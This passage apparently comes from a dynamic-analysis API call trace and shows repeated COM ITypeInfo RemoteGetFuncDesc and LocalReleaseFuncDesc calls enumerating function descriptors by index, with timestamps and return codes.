ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x81, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x82, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x83, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x84, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x85, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x86, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x87, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.178] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.178] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x88, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x89, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x8f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x90, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x91, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x92, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x93, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x94, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x95, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x96, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x97, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x98, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x99, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9a, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9b, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.179] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.179] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9c, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9d, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9e, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x9f, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xa9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaa, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xab, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xac, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xad, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xae, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xaf, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.180] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.180] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xb9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xba, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbb, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbc, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbd, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbe, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xbf, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.181] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.181] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xc9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xca, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcb, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcc, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcd, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xce, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xcf, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd0, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd1, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd2, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd3, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd4, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd5, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd6, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd7, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd8, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.182] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.182] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xd9, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0xda, ppFuncDesc=0x33e4fb65c8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb65c8, pDummy=0x6) returned 0x0 [0060.183] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.183] ITypeInfo:RemoteGetFuncDesc (in: 